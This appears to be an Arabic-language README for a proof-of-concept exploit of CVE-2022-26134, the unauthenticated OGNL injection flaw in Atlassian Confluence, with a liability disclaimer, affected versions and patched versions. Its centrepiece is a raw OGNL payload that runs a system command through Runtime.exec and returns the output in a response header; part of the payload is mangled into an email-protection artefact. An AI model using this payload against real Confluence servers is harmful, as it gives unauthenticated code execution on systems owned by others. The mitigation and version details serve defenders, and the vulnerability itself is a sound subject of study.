بوتكون
ثغرة تنفيذ تعليمات برمجية عن بعد غير مصادق عليها في أطلاسيان كونفلونس عبر حقن OGNL (CVE-2022-26134)
- في 2 يونيو 2022، أصدرت أطلاسيان نشرة أمنية لتطبيقات Confluence Server وConfluence Center، مسلطة الضوء على ثغرة خطيرة جداً تسمح بتنفيذ تعليمات برمجية عن بعد بدون مصادقة. تسمح ثغرة حقن OGNL لمستخدم غير مصادق بتنفيذ تعليمات برمجية عشوائية على خادم Confluence أو مركز البيانات.
اقرأ هذا !
استخدم بحذر. أنت المسؤول عن أفعالك
المطورون لا يتحملون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام أو ضرر.

الحمولة الخام (RAW Payload)
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
تفاصيل الثغرة
-
المنتج المتأثر :
- كونفلونس
- Confluence Server
- Confluence Data Center
-
الإصدارات المتأثرة :
- جميع الإصدارات المدعومة من Confluence Server وConfluence Data Center متأثرة.
- إصدارات Confluence Server وConfluence Data Center بعد 1.3.0 متأثرة.
إجراءات التخفيف
- قم بتحديث إصدار أطلاسيان كونفلونس الخاص بك إلى هذه الإصدارات المعدلة :
- 7.4.17
- 7.13.7
- 7.14.3
- 7.15.2
- 7.16.4
- 7.17.4
- 7.18.1